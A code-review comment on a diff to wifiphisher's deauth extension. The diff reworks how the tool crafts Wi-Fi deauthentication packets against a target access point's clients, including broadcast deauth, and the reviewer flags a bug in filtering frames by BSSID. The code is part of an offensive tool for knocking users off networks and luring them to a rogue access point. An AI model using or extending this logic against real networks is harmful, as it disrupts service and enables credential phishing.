wifiphisher/extensions/deauth.py

```diff
@@ -18,171 +18,191 @@ def __init__(self, data):
-                if receiver == bssid:
-                    # add the sender to the client list
-                    self._observed_clients.append(sender)
-
-                    # create and add deauthentication packets for client
-                    self.packets_to_send += self._craft_packet(sender,
-                                                               receiver,
-                                                               bssid)
-                    self.packets_to_send += self._craft_packet(receiver,
-                                                               sender,
-                                                               bssid)
-
-                # in case the sender is the access point
-                elif sender == bssid:
-                    # add the receiver to the client list
-                    self._observed_clients.append(receiver)
-
-                    # create and add deauthentication packets for client
-                    self.packets_to_send += self._craft_packet(receiver,
-                                                               sender,
-                                                               bssid)
-                    self.packets_to_send += self._craft_packet(sender,
-                                                               receiver,
-                                                               bssid)
-        return (channels, self.packets_to_send)
+        except AttributeError:
+            return ([], [])
+
+        # when --essid is used we don't have target_ap_bssid
+        if self._data.target_ap_bssid:
+            # we need to create this packet only once
+            if self._first_run:
+                # Craft and add deauth/disas packet to broadcast address
+                packets_to_send += self._craft_packet(self._data.target_ap_bssid,
+                                                      constants.WIFI_BROADCAST,
+                                                      self._data.target_ap_bssid)
+                self._first_run = False
+
+            bssid = self._data.target_ap_bssid
+            channels.append(self._data.target_ap_channel)
+        else:
+            bssid = self._extract_bssid(packet)
+
+            # Do not send deauth for our rogue access point
+            if bssid == self._data.rogue_ap_mac:
+                return ([], [])
+
+            # obtain the channel for this packet
+            try:
+                # channel is in the third IE of Dot11Elt
+                channel = ord(packet[dot11.Dot11Elt][2].info)
+
+                # check if this is valid channel
+                if channel not in constants.ALL_2G_CHANNELS:
+                    return ([], [])
+
+                channels.append(str(channel))
+            except (TypeError, IndexError):
+                # just return empty channel and packet
+                return ([], [])
+
+        clients = self._add_clients(sender, receiver, bssid)
+
```

Comment:
@blackHatMonkey we have logic error here. This frame may be for the other BSSID instead of the target attacking BSSID. 

Consider a case:
our target attacking BSSID is 33:33:33:33:33:33 and we received a frame has the following addresses:
address 1: 11:11:11:11:11:11
address 2 : 22:22:22:22:22:22
address 3 : 22:22:22:22:22:22

we'll not drop this frame and change the address 3 for our BSSID which is not correct.
I have fixed this in #711.